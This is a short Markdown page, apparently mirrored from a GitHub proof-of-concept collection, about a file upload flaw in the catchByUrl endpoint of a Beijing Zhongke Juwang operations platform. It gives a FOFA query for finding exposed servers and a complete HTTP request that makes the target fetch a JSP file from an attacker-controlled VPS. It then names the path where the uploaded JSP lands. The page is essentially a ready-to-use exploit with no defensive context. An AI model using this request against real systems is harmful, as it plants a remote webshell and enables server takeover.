mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
22 lines
594 B
Markdown
22 lines
594 B
Markdown
## 北京中科聚网一体化运营平台catchByUrl存在文件上传漏洞
|
|
|
|
## fofa
|
|
```
|
|
body="thirdparty/ueditor/WordPaster"
|
|
```
|
|
|
|
## poc
|
|
```
|
|
GET /resources/files/ue/catchByUrl?url=http://vpsip/exp.jsp HTTP/1.1
|
|
Host:
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
|
|
Accept-Encoding: gzip, deflate, br
|
|
Accept: */*
|
|
Accept-Language: en-US;q=0.9,en;q=0.8
|
|
Connection: close
|
|
```
|
|
|
|

|
|
|
|
文件路径`http://ip/files/headimg/.jsp`
|